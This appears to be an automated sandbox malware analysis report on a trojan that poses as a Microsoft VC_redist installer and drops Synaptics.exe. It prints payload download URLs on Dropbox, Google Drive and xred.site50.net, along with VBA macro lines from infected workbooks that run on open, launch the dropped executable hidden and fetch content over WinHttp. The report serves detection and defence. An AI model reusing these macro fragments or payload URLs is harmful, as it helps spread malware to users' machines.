Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SJaGJv1NDMTqC_oXqIk5gNT1iFvsSse1ESBhgKJeDbWchWiWb7pdDdJgGWB8sET60stBhbxYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:41:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_uejDZ1rBjCZrXvUMr-Jqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: ._cache_file.exe	String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: file.exe, ._cache_file.exe.0.dr, ._cache_file.exe.1.dr, Synaptics.exe.0.dr	String found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: ~$cache1.3.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978c;
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978scrC
Source: ._cache_file.exe, 00000002.00000002.3581343704.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, ._cache_file.exe, 00000002.00000002.3581074590.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, thm.xml.2.dr	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: ~$cache1.3.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
Source: ~$cache1.3.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: ~$cache1.3.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3580003421.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/user
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: ~$cache1.3.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: Synaptics.exe, 00000003.00000002.3580003421.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428484237.0000000000661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=doW#
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: ~$cache1.3.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000063A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZb
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000063A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf7w7;
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: ~DFC577DADA6953CA4C.TMP.4.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428484237.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000003.2428484237.0000000000696000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
Source: Synaptics.exe, 00000003.00000002.3580003421.000000000068F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWZg
Source: Synaptics.exe, 00000003.00000002.3580003421.00000000005FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
Source: ~$cache1.3.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
Source: ~$cache1.3.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: ~DFC577DADA6953CA4C.TMP.4.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000003.00000002.3581917654.0000000002130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443

Source: unknown	HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.4:49887 version: TLS 1.2

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: mAsbqr4h.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: YPSIACHYXW.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: mAsbqr4h.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: YPSIACHYXW.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: mAsbqr4h.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: YPSIACHYXW.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BC0FA	1_2_000BC0FA
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_00096184	1_2_00096184
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C022D	1_2_000C022D
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000CA3B0	1_2_000CA3B0
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C0662	1_2_000C0662
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_0009A7EF	1_2_0009A7EF
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000CA85E	1_2_000CA85E
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BF919	1_2_000BF919
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000A69CC	1_2_000A69CC
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C0A97	1_2_000C0A97
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C2B21	1_2_000C2B21
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000CED4C	1_2_000CED4C
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000C2D50	1_2_000C2D50
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000BFE15	1_2_000BFE15
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BC0FA	2_2_006BC0FA
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_00696184	2_2_00696184
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C022D	2_2_006C022D
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006CA3B0	2_2_006CA3B0
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C0662	2_2_006C0662
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_0069A7EF	2_2_0069A7EF
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006CA85E	2_2_006CA85E
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BF919	2_2_006BF919
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006A69CC	2_2_006A69CC
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C0A97	2_2_006C0A97
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C2B21	2_2_006C2B21
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006CED4C	2_2_006CED4C
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006C2D50	2_2_006C2D50
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006BFE15	2_2_006BFE15
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8D23E7	2_2_6C8D23E7
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8E1CFF	2_2_6C8E1CFF
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8E8500	2_2_6C8E8500
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8ED628	2_2_6C8ED628
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8E1F2E	2_2_6C8E1F2E
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_6C8E89AE	2_2_6C8E89AE

Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: mAsbqr4h.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: YPSIACHYXW.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Synaptics\RCX1D61.tmp 7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 00091F20 appears 54 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 000D31C7 appears 85 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 000D012F appears 678 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 000937D3 appears 496 times
Source: C:\Users\user\Desktop\._cache_file.exe	Code function: String function: 000D061A appears 34 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 006D31C7 appears 82 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 00691F20 appears 54 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 006D012F appears 678 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 6C8D3D10 appears 82 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 6C8DD536 appears 38 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 006937D3 appears 496 times
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: String function: 006D061A appears 34 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: file.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX1D61.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: file.exe, 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000003.1743128874.0000000002F80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs file.exe
Source: file.exe, 00000000.00000003.1743203350.000000000142F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000003.1743203350.000000000142F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe
Source: file.exe, 00000000.00000002.1750143339.000000000146D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe
Source: ._cache_file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: ._cache_file.exe, 00000001.00000000.1719507742.00000000000FE000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe
Source: ._cache_file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: ._cache_file.exe, 00000002.00000000.1720811432.00000000006FE000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe
Source: ._cache_file.exe, 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamewixstdba.dll\ vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameb! vs file.exe
Source: ._cache_file.exe.0.dr	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe
Source: ._cache_file.exe.1.dr	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal70.troj.expl.winEXE@11/46@4/3

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000CFD20 FormatMessageW,GetLastError,LocalFree,

1_2_000CFD20

Source: C:\Users\user\Desktop\._cache_file.exe	Code function: 1_2_000944E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		1_2_000944E9
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Code function: 2_2_006944E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		2_2_006944E9

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000D2F23 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

1_2_000D2F23

Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe

Code function: 2_2_6C8DCEBD FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,

2_2_6C8DCEBD

Source: C:\Users\user\Desktop\._cache_file.exe

Code function: 1_2_000B6945 ChangeServiceConfigW,GetLastError,

1_2_000B6945

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Desktop\._cache_file.exe

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X

Source: C:\Users\user\Desktop\._cache_file.exe

File created: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\

Jump to behavior

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1707797883.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX1D61.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: cabinet.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: msi.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: version.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: wininet.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: comres.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: clbcatq.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: msasn1.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: crypt32.dll	1_2_00091070
Source: C:\Users\user\Desktop\._cache_file.exe	Command line argument: feclient.dll	1_2_00091070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: cabinet.dll	2_2_00691070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: msi.dll	2_2_00691070
Source: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe	Command line argument: version.dll	2_2_00691070
